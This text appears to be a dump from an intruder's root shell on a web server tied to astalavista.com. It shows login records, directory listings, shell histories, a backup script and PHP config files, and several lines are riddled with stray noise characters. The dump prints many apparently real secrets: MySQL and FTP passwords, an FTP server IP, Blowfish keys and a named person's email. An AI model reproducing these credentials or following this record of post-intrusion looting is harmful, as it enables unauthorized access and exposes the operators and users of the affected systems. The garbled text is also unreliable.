1 S; D, h7 ?: T- a/ U8 ?#####################################################/ b1 |. f1 ^+ [1 n5 \4 U7 A
#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #
; f8 ` ^6 P& E- g# |__| [__ | |__| | |__| | | | [__ | |__| #, W5 b. ]0 {( Q6 c9 K- h- i
# | | ___] | | | |___ | | \/ | ___] | | | #) u3 P5 ]1 d2 Y% J D9 {
# # A* S. d* ~/ Y& r) v1 J6 w/ Z
#####################################################) ~0 x" Z6 M! A8 d+ b' c+ q
# # ?# @# \) m5 q/ Z+ w" b
# Admin Contact - 链接标记support@secureservertech.com #0 g# H/ _; M" {* T9 [. j7 q! [
# #
$ h1 m' @: j- H6 R# Available ShortCuts #1 m0 B X% N7 h! w+ {4 R
# #) f5 V7 z$ q8 J: ` n
# nst - list active connections #, c6 L5 Y" r6 a
# ddos - shows how many times each ip is connected ## _8 n) m, r; _2 h. y
# ltr - restart the webserver #; a5 e" W& H9 _/ e; e" ?
# phpc - edit the php config file #
, q; V5 L d& b2 `, }# htc - edit the webserver configuration file #
$ S; q, n# N) S/ z% p# i# up - uptime #7 `" Z* ^0 }* G5 C
# etd - edit the motd of the day file #8 q& i$ F9 M; {7 f) ~' Y' s2 U
# htr - start and restart apache if needed #2 R9 ?7 y& \& i/ v
# syng - shows active SYN_RECV connections #
- {. [4 N/ F9 }7 o; e; Z# synd - syn flood blocker - “synd -h” for usage #
8 R: T. u3 P8 D( E% o$ l#####################################################
2 G! X5 o. s# E1 R& V( L# NOTES: #
3 p [+ i l4 X: B# Last Upgrade - 12-08-2008 by JF #
% g0 q4 U w' f8 {6 R$ N# g' M2 l) i! ^# My.cnf/Mysql Optimization - 1-28-09 #
! k5 h; R' v8 J R' b# #
/ \# V y9 j/ ^' {% J n# #7 K: Z1 V& W/ }
# #8 w0 u4 D- U( V& _! j* @* ]: g* U% R+ B* w
#####################################################
( e/ U1 x8 B1 s4 i# K; \5 P
# b8 X/ x G t3 Ysh-3.2# lastlog | grep -v Never/ x+ N2 [4 J2 F, h: F+ _; g/ Z
Username Port From Latest
. a3 W( X1 j1 Z$ U5 ^root pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009
; e1 H* t2 N( e% f$ J( E( badmin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008) F/ M( Z: v1 [( k
com pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009( G$ O8 {# n7 E8 d4 g8 Y, W% d
astanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009
2 P3 P/ Q- ^1 E( R5 _4 k! l
( [2 r9 ~9 l: wsh-3.2# ls -la
9 j2 Y# V# q+ Atotal 453376
! ]1 d- U5 O# P9 h gdrwxr-x— 15 root root 4096 Jun 4 08:40 .
0 \0 g: g: c+ }3 ]drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
3 {3 E* a) w. e, G, H-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip# }) n3 G" {9 i0 |) I
-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg
% A, I& `: |' `) a" G-rw——- 1 root root 16836 Jun 4 07:21 .bash_history( a$ a. c' J5 g8 w+ O) I- F6 D
-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout
0 v7 S: p3 [: l5 n& a" |9 y-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile2 K9 K x# o* x. m' E$ Z! @
-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc
: f# a- B" ]- G9 y, J) l-rwx—— 1 root root 1899 Oct 28 2007 bk.sh/ _, \ m# M: k' l* l G M. O
-rw-r–r– 1 root root 1327 Nov 29 2007 cert
7 F* [1 b' V- J-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql
, k. a& k6 H( Q( y, l E4 o: tdrwxr-xr-x 4 root root 4096 May 20 2008 .cpan
9 e. n* Y+ P/ v" ?& l-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc/ Z9 O" N y# z/ J
-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql C! k# ?, j1 { \( A! M( u) \
drwx—— 2 root root 4096 Oct 28 2007 .elinks
; s" I& U, V* {+ H. M! zdrwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1
# M/ a' k/ J. v6 p' s$ j+ R-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2
, `" c& b. O% w-rw——- 1 root root 0 Apr 16 13:19 .history/ Q$ i% u+ I& i# Z# g8 V
-rw-r–r– 1 root root 16095 Sep 11 2007 install.log
& \6 Z1 q4 E! n- x1 E" `3 K-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog
" `8 h n6 Z# \. o9 F9 [6 ^-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh
9 ~7 v: F- e9 A-rw——- 1 root root 35 Jun 2 14:23 .lesshst
" }+ S* L& E7 E; ]- ]drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp- W( M' Y+ `- ]
drwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec
9 ?( ?% o) q. C6 K-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz$ \0 k+ z0 h/ K& h1 E- Z) c
-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2
+ P9 f6 b$ O3 t% R1 d-rwx—— 1 root root 760 Sep 18 2008 lp# s' x5 F' w8 B- A8 E1 Y" B
drwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1
0 F( W8 X0 I( d2 _- |! Y-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz
5 i6 Z& z, C3 t- G2 O0 _-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1
* h$ r) D3 `/ y- t Ddrwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9
2 [0 ?# H' i% [3 V9 \* N-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz* J+ z) M4 z3 _ b e7 F
drwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3
5 L1 S: Q; m. F0 y% k" E-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz
$ C; t% M2 l- d4 I-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh u9 f) E$ x( K% o; C3 ?
-rw——- 1 root root 41 Oct 19 2007 .my.cnf
, l$ j& A _: e% f* d6 @0 X: |' n-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history% U, b7 K" q6 d9 h9 m* ?- {
-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport
9 Z% B) q4 R, @9 F4 J-rw——- 1 root root 41 May 20 2008 .mytop% P- o( a [; k6 d+ g
drwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.63 v1 }6 F' d' N9 U
-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz' L/ X4 a' p. u1 _5 m( N
drwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp
5 v1 U4 e: I, ` i6 J-rw——- 1 root root 1462 Sep 21 2007 opt.php
% F* ?/ c$ C1 e/ k0 I! s, G-rw-r–r– 1 root root 3371 Sep 22 2007 p
( ]' s* }# D3 Y- J* U-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2
( Q G5 n4 I# F" B' |-rw——- 1 root root 1024 Feb 3 21:32 .rnd) A) @) j$ O& P
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
- g1 [+ u2 c' ]) s% L- l4 p-rw-r–r– 1 root root 887 Nov 28 2007 server.key
/ U: t" W7 C7 ^/ `drwx—— 2 root root 4096 Oct 10 2008 .ssh$ k9 R9 ?: n% X) C/ u. u1 q
-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat9 N2 G0 E4 N! S* K/ J
-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc
. l& X) _! ~8 E-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip& x: R; `- V3 l* L
-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1
- |9 [4 D9 @$ Ndrwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp
; K: p5 B9 N# `- t6 }+ K% [$ y-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh
! Z: b6 k5 c+ }+ C0 G8 edrwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0
( F3 Y' T; W; `- U, _-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz20 E) F5 K: b' W, a" r( N
-rw——- 1 root root 12997 May 16 2008 .viminfo
$ ]+ _- b) k9 k7 h, [
" M/ q3 J: p6 L) ash-3.2# cat .bash_history D9 {% B# E' K4 b- L2 J6 |( j$ U2 ^: j
[snip]
1 ]9 S5 S7 O% m1 P; |2 W# N: u+ ^. kwget cp4sst.com/sstlinux.tar.gz
: k0 }3 R" W2 J+ F- K: V jtar zxvf sstlinux.tar.gz
: I2 U. C w2 `/ A+ kcd linux-2.6.27.10
4 {% L$ X' W+ P! Rsh install.sh
) R: W' W) l; N4 q4 A; J" Kmake bzImage ; make modules ; make modules_install ; make install
$ j" v7 {% _# |9 Bmake clean) S& M. t6 [' [) K+ C3 A8 G
service mysqld restart
7 u: U0 M, W% d' [! f8 Q' p# k[snip]+ @! m! V1 p0 y* F; Z' \9 m" L: }
cd /usr/sbin/1 u( G% `$ [ w8 b3 J; @- g
chmod 4777 traceroute
" Q* }! Z; q( h0 h0 }chmod 4777 ping! B1 n- u1 b& Q0 Y
traceroute -I 链接标记[url]www.astalavista.ch[/url]5 F8 y/ c6 j3 t- O+ c t8 l5 P
[snip]. A, X1 x6 M8 o) t! G
vi /etc/csf/csf.conf
1 M* K; D- f/ H1 |traceroute google.ch. X$ B1 o4 E) w* [, I& G
service csf restart
0 r! B6 v$ b4 @6 W$ \5 Ltracert google.ch
! Q; m! l9 X3 D# R2 yservice csf restart: N; I& {9 z( e' Y6 z+ N. p
traceroute 链接标记[url]www.google.ch[/url]1 X# R- w/ s& C3 I5 E7 C" d
tracert 链接标记[url]www.google.ch[/url]' t, h/ \9 D& B: {
traceroute 链接标记[url]www.google.ch[/url]3 Z( ?; {! C# q& L' Y
locate traceroute# Z) I5 S! h" |2 E! ^% b
chown 4755 /bin/traceroute
6 ^8 J S) z' X$ ?8 o3 F h% a/ T, Hchown 4777 /bin/traceroute
1 F8 n! z1 M& \3 o, [locate ping5 ] ` K+ G6 i+ X
chown 4755 /bin/ping$ Y. v! r. v& k7 p) @
chown 4777 /bin/ping
9 |1 P% v* A" L9 gcd /bin/. e5 k& K; V. u# a0 f9 L
ls -ali | grep ping
1 n) ^/ K( W% ]" }chown root ping
9 G( A+ a8 F! R7 Dchmod 4755 ping0 U. Y$ s! t9 O9 n5 S* p( ]5 h3 c
ls -ali | grep traceroute( y! K0 P" x# n& H' w+ m2 N6 `
chown root traceroute! d! C C G) S$ W' [5 T
chmod 4755 traceroute
0 i4 t) g7 q( ~ls -ali | grep traceroute. i1 W, m! f' |4 q: D
traceroute -I 链接标记[url]www.google.ch[/url]
4 ]3 V. _1 k; xtraceroute 链接标记[url]www.google.ch[/url]8 \* Q! x# D* B- v9 v, S4 l
whois pmsantos.ch
* i) U) a. F7 ~+ V" e9 z[snip]3 q% v' A3 Y m
mysql -h com_contrexx2_live < /root/defaultp_ports.sql: c! H$ x. \3 p" {" O9 s, z. c
mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql6 J, E) z( L* m
mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql3 l: o; f; }: e
mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql" e4 e; \* r* }9 {
top8 Q ?, ~, y* k" r* D3 r
ping ssth.ch9 s$ S9 I/ I+ _3 _
ping asdlkfaljgasd???ljg???lasj.ch X. [: E. |% W8 c& M& Q6 |
ping asdlkfaljgasdlasj.ch1 y% Y9 ]! V3 ?% C
ping 链接标记[url]www.ssth.ch[/url]
' L o7 u% t" Kping ssth.ch
$ [: z9 g. N& r1 p" @1 ^# y8 Knslookup 链接标记[url]www.google.ch[/url]
, c; q+ r2 w& Z+ A$ H/ t) }nslookup 链接标记[url]www.ssth.ch[/url]" @" M8 T, F; ]7 e1 Q" z. p! _
man nslookup( ]4 J$ e1 `# O2 ^: f
ping 链接标记[url]www.google.ch[/url]
1 @# x% i4 U7 I8 \nslookup 链接标记[url]www.google.ch[/url]
1 g+ [/ \3 J1 V: ~) P( M) W9 d2 ?nslookup 链接标记[url]www.google.ch[/url]
% s$ y1 g- D8 r# Rnslookup salfjasdlf.ch
@' b- Y; Z% x& F[snip]
$ x4 k: [7 K0 v% Q4 H$ ^0 N0 u0 sopenssl passwd -1 sadf" D B0 \2 G6 l/ m' s
openssl passwd -1 5cZNHstdTy2 n! k O, Y! M" S2 @. X
mysql% {* q `5 G) E0 [, b8 B# {- @" P$ O
mysql* P4 ^: |9 ]+ O. G$ O
locate proftp
2 R1 a0 W5 ^( k! R$ Ovi /etc/proftpd.passwd2 \% E5 j) ^* b) i, d
service proftpd restart. o, t3 Q; b' F3 C* c- `+ A
locate proftpd.conf
( o3 O; r9 {5 x' f1 rvi /etc/proftpd.conf' j' E9 s3 _& n U
vi /etc/proftpd.passwd2 H8 U3 {1 T4 D- u5 c3 U; l4 T
service proftpd restart
! y* g" H! q5 d) N7 U' T[snip]
% Z S, }0 B7 z# C9 y; @3 s/bin/sh /home/com/backup_system/backup.sh
" i5 Y( Y) f2 w. ?* Qtar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin
# ^" H4 Z8 u, g2 o; b2 Amysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql
, {, O7 \6 c; c2 v+ j# V( ~mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql
6 {# F3 O# o! C ?* S8 @" }8 Als -ali. w& [# f* y) T% v, l
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql
* O; A9 y$ C. k3 {mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql
) B# m6 S) z8 q! W H5 [crontab -l( Q9 [9 J' A. @8 Y: H
crontab -l3 ^" V, }' w8 N) f
php -q /home/com/public_html/modifications/cronjobs/securitynews.php1 X6 U9 R3 q! I7 P
/home/com/public_html/modifications/cronjobs/exploits.sh) X# _* ~2 A f2 x$ `
wget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]
1 F- [2 D1 ]) B$ H5 Vtar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz1 m$ z: k: f5 ^+ W& x
cd lsws-4.0.3- L/ _% z- h$ v$ i6 ?7 J
sh install.sh+ G" E* m7 Z" ~) h% x, H3 a
uptime
! e3 ~( s3 p( {% Uhdparm -tt /dev/sda
' R2 t% R; ^' E8 [' I3 liostat! _+ x# ^5 Q0 K+ @. V# `& F) | T9 M
yum install iostat0 e) e2 \; g, ]/ R
iostat, M) O$ v7 ?7 Y. m$ }. T' S
whereis iostat
7 }6 U4 i+ W2 o3 u: [ [. h1 wyjm clean all" ^! I6 }# ~5 g* @9 E
yum clean all ; yum -y update: `8 q4 g* `5 t
iostat
+ h# [: X, D ~: n- gyum install systat
3 s: y! P4 h1 Q8 j- U9 wrpm -qa | grep iostat* M" `/ B, z! \% \; j
rpm -qa | grep sysstat
`$ N$ F9 E$ T) `1 W. m$ l# Krpm -qa | grep systat
+ H3 N& [5 A% g" ndmesg -c
% s5 m1 V4 N; L$ J- Q% Hsysctl -p
6 ?6 _7 k! ^) Q1 S ^# euname -r9 i5 H! ]: n$ [; ?
cd /usr/src; P- i6 M7 c3 `! R" C V
wget nix101.com/kernels/sstlinux.tar.gz
" L! T) C* x* Lshutdown -r now
( u$ Y+ K' [1 \, ^/ c! j Znano -w /boot/grub/grub.conf& D$ i* n/ r8 Z) w% [$ c
0 S9 P7 a- h# c! ~sh-3.2# cat .my.cnf: m* {! s' R4 }& l' a
[client]
3 D" {* E+ Z& euser=da_admin9 e% ?, R, V6 V# M9 p7 U, I
password=X9dctmRH/ [* R7 G7 T$ g- Q( y h q
: n% O9 O ~& J* x# ish-3.2# cat /home/com/backup_system/backup.sh
: V" X( T2 I4 G. `* A( y#!/bin/sh4 J/ `# B2 M# U8 \
#####################################################################
2 X) i+ S& K d: g7 [ S# #
7 b- c) a+ u# b7 z' J1 k% ~! r# incremental backup for astalavista.com #
" N! q' e" T4 L: X0 R# #
* M6 b9 A: L* g3 {$ n# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #
3 d& i1 u( [+ n# g# #
1 ?3 @2 |4 |2 c% U2 K+ f#####################################################################* v v& k" R! J- d3 F# c
[snip]
. s6 I! w1 s& B) T( I2 T: GPROG_DIR=”/home/com/backup_system”;4 a) ?4 v5 d |
BACKUP_DIR=”/home/com/backups”;
; t0 n: G, R [" ^+ ?2 n+ c& C$ WDOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;
# `% a9 d- T2 F. ?/ y. ^+ t' |8 q# ftp for synology backup server3 I! h0 O$ I$ \2 W
FTP_HOST=”212.254.194.163″;
2 w; N/ o- r' Y5 o1 `FTP_PORT=”21″;
+ y: H- ?! a' \- oFTP_USER=”astalavista.com”;& b, J$ j, O' J7 y% h1 H
FTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;3 @& n. z$ I/ c: b5 O. y2 P, |' \+ V
FTP_DIR=”/astalavista.com”;
* L( ~: P; }0 Q) @, \# database
8 ^: u* _" [, x) J& P" TDB_HOST=”localhost”;8 u9 a, b3 ~3 J" k5 n3 ]
DB_USER=”contrexxuser2″;
! B* m& ^+ A' s/ h# q6 uDB_PASS=”0fEYNZgXz1pKe”;
$ S( |8 U1 P9 i* V7 y1 Z5 \. `DB_DATABASE1=”com_contrexx2_live”;
3 _. R& n5 B. o q$ E7 V2 ?DB_DATABASE2=”com_contrexx2″;
# d; I8 ?& h* z5 ~% _5 F. ]! D1 _[snip]( u% t! I" _3 g
ftp -in $FTP_HOST $FTP_PORT <<EOF
. f' y) t( c$ U0 I& o$ ]% hquote USER $FTP_USER
g+ g9 z7 Q/ f2 R) c+ Squote PASS $FTP_PASS
0 e! o, V1 z V1 q6 ucd $FTP_DIR& ?$ ^, ?8 J* c; k3 q( v( W7 X9 x/ Q
put $DB_FULLNAME-SQL_Dump.tar
V [% z% B9 I& Y+ }- rput $BACKUP_FULLNAME-Public_HTML.tar
0 @7 f+ p0 ~8 N6 Nclose
3 c( t% f/ K2 S& A( P8 p* j; z) Fbye8 Y+ o+ z9 U9 T
EOF
' D1 M! [ w7 m" N" E+ p
& T- [' o2 k# |9 ~& Q% \2 gsh-3.2# cd /home ?8 n) u3 T7 m4 P1 s
sh-3.2# ls -la
3 Z, ~5 `. g+ S3 V( ntotal 120/ n7 y& z6 A b3 V4 d3 N& D' M; `
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .1 `2 F6 k( ?+ I9 s/ Q r- H. ~
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
! t, N+ U3 K6 d1 d+ qdrwx–x–x 9 admin admin 4096 Nov 28 2007 admin2 {# {5 A0 T2 \
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
M! x3 \, o3 x4 W3 x-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
- w! J8 ?' P4 u9 [drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet! A- o& K3 g% W
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup) ?" c3 c& |3 L
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
) w1 o4 l7 H5 u! N1 b$ Z6 Kdrwx–x–x 10 com com 4096 Apr 28 12:40 com% W, O8 R2 U6 s3 z( \0 ?1 W% a
drwxr-xr-x 2 root root 4096 May 17 2007 ftp' K1 L' K P+ O6 n! X+ f" C* ^
drwx—— 3 jon jon 4096 Sep 21 2007 jon
# _8 M [! t3 }7 J# ~+ qdrwx—— 2 root root 16384 Sep 11 2007 lost+found& l0 C% K: F7 m! B, |: m4 K& y3 E
drwxr-xr-x 2 root root 4096 Sep 14 2007 my
! W u# Z# a3 i6 o4 ldrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata- E" t2 R+ p+ D1 C! x. e T
drwx—— 2 jon jon 4096 Sep 15 2007 test
' I1 w9 u0 d, D1 e- L: _0 [# Odrwxrwxrwt 2 root root 4096 Jul 29 2008 tmp8 U6 J' M! W4 A, W: U4 A: _
- j) w- E1 w. N4 G
sh-3.2# cd admin& ? g: Q/ O" A
sh-3.2# ls -la) z! |5 I3 x P. R1 L2 m% L8 e
total 1735896
. i9 W6 Y4 T- e4 V2 b" A6 ]drwx–x–x 9 admin admin 4096 Nov 28 2007 .
* ^1 z( }/ P- a/ `" t2 j% Vdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..( W) Z5 D5 u! `' a
drwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups
- r0 N9 u7 @. l8 ^* [drwx—— 2 admin admin 4096 Sep 28 2007 backups
- } M+ @4 x `2 y: b5 O-rw——- 1 admin admin 860 Sep 17 2008 .bash_history. {" f! s9 E: ^. W6 s
-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout
( r9 L0 x% N: f! k-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile2 y7 q1 i& {# p, x3 L2 w) G
-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc) n7 c) _: h2 h
drwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups
- M2 O7 f/ Z, idrwx–x–x 6 admin admin 4096 Sep 21 2007 domains+ B ?/ ~2 O7 \- i
drwxrwx— 3 admin mail 4096 Sep 21 2007 imap
! w7 H; Y t# U& H: B2 J0 v-rw-r–r– 1 root root 24 Sep 21 2007 info.php% s4 p7 J" V' J+ M
drwx—— 2 admin admin 4096 Sep 21 2007 mail
% s- G- Y# b1 b-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
/ `! u4 ~5 E" q: v-rw-r–r– 1 root root 887 Nov 28 2007 server.key
4 T- y. W9 G0 V6 h-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow9 ^1 i# G) S6 Y. w7 m1 A2 ^
-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz: E& [2 [( @$ H$ c& R4 P
drwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups
/ p; J$ _1 P( i3 R) t
7 Q* y3 |0 d; D1 e0 dsh-3.2# ..
: T, g! V, N& w3 Wsh-3.2# cd jon# V! Q7 L* |6 W n/ b
sh-3.2# ls -la$ ~: J4 |4 t6 Q
total 36
* [: J0 R$ e# q7 V+ g/ b0 edrwx—— 3 jon jon 4096 Sep 21 2007 .& l0 X u; m- D2 ^" R; f
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
$ p; v( e8 }8 R-rw——- 1 jon jon 53 Sep 21 2007 .bash_history, x" a V) Y2 N6 `( e) i3 k
-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout8 X" s- }5 j" l# K* ?
-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile) Q$ l. ~' Y# l- l8 Y4 ?1 k1 K5 v& Z
-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc
( I( Q, d( c, r8 U' {-rw-r–r– 1 root root 24 Sep 21 2007 info.php( n( J1 u- O" N8 m2 |, `
drwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html# c# H) c' g; p
/ w# N, L" w/ msh-3.2# cd ..$ n M5 b7 F0 ~! A; r
sh-3.2# cd test
; O3 y/ B5 V; O* N: }sh-3.2# ls -la' x6 h8 X! Q6 O& f( m% U1 R
total 48
1 a# D t, `, [/ z6 K+ zdrwx—— 2 jon jon 4096 Sep 15 2007 .: T7 t- T" Z( Q7 a
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
* o# |5 K! g8 z; w; O; G-rw——- 1 jon jon 79 Sep 21 2007 .bash_history
4 ?( }5 K' L2 D* m q-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout
: |9 K) S: Q. D-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile% [; N4 N4 B. ]! d
-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc
* U* l. x1 n: C2 v6 z) csh-3.2# cat .bash_history
/ \) a# I+ Z$ ?/usr/bin/mysqladmin -u root password PoliuJhytg67
( A3 P- e0 R- H: d0 k- A
; v. T/ H7 _+ xsh-3.2# cd ..
. r. }) v/ l! Z7 \$ dsh-3.2# cd astanet
0 d. R+ `5 z% H& v% b' \sh-3.2# ls -la
; m4 L* a+ E9 f, V/ w! Ltotal 52' d# g3 _6 L% A. `
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .
# T2 Y: M4 Z) w8 p6 n ydrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
, J S, n0 T; j( jdrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
: l3 C2 T+ e4 I-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
2 C! Q5 b y8 Q% V+ R0 _-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout @' M4 z7 r! B4 n# ?$ r
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile/ G7 h {' f/ l/ O& i
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
. A* v; l7 N- r5 X- bdrwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains; n6 @' R" c$ q$ T6 S1 H1 A( ?
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
4 [1 T/ M$ K8 R1 h5 Z) x' T! Ddrwx—— 2 astanet astanet 4096 Dec 23 12:18 mail$ z. k' U0 p# x/ X! }% e! w
-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history9 [1 [9 D( T& ]# W
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html! {, I2 C! k! s
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow4 T, h" i. T* o. _! {1 N* s
5 i- C3 E9 g5 nsh-3.2# cd auth/
- q! C3 X: F# U7 jsh-3.2# ls -la
3 O" H! J/ x& `total 28, ^5 X! F# m. F6 S0 K8 ^5 K I* b: Q
drwxr-xr-x 2 root root 4096 Dec 23 16:00 .
: D4 e; T1 x8 A udrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..3 f E; z6 r7 t" `
-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php4 N2 b% p. v7 s+ G0 g
-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php" ~6 B' D$ `1 m1 V" R) q/ D/ T
-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd
" A1 |3 s% q+ a$ e1 D, ^-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting
( F m; [ \* L( @0 Z% @6 I' h& z-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd
3 K7 s3 {0 H3 \6 o9 [& Q7 Z- E- B; w* j- @5 F4 P# k
sh-3.2# cat hackercontest.config.inc.php
# p4 T; W" S- t" H: y) {, n* l<?PHP
& J+ @+ h) T. h. P% _# M// Variabeln f?r Verbindung zur Datenbank //
* B2 k* \- b2 P7 n8 g* N7 B8 ?7 P$conxHost = ‘localhost’; // MySQL hostname$ O8 E; T" }; g; j) E
$conxUser = ‘hackercontest’; // MySQL user
: \* v) |6 Q* t$ n, X& U4 L$conxPassword = ‘K6m@7dUc’; // MySQL password
* |7 n8 S; n$ T7 y, }$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
: B* |0 J) l8 D! Q% M/ C% e* q- T9 g?>
. Z0 L- P4 u5 e* csh-3.2# cat hosting.config.inc.php
5 K( Z' T) j0 q1 z<?PHP6 G% D1 |! X5 N. j6 \7 Y
// Variabeln f?r Verbindung zur Datenbank //
6 Y& G9 m1 o; G7 F8 I& ]" S$conxHost = ‘localhost’; // MySQL hostname2 n, i G% r7 u7 \
$conxUser = ‘hostinguser’; // MySQL user2 D$ f* y3 [$ c, z! @* R
$conxPassword = ‘cXvB3981′; // MySQL password
7 R0 ~ ]6 N4 `+ ?$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
2 x& z, m" i3 D" J, E4 D; J?>
% P2 h4 ~8 W( U1 V, k
W9 `: f7 Q- _2 U8 lsh-3.2# cd ..
# a2 E$ f; m7 |; a8 k+ fsh-3.2# cd com+ V8 w6 G0 w0 C( R0 [$ ~
sh-3.2# ls -la
8 s) t) E( D8 d( a/ [) rtotal 141208( o' ]) o" Q& A& O
drwx–x–x 10 com com 4096 Apr 28 12:40 .
/ N, u/ q2 L6 \& E+ ydrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..4 ^4 ]1 u7 W# G; j: A6 M
drwx—— 2 com com 4096 Jun 4 04:04 backups- P$ R) O- Y! T- A6 {* v6 s. s
-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql
* E$ L( f: B! s9 J1 P+ F! L, Tdrwxr-xr-x 2 com com 4096 May 12 15:20 backup_system
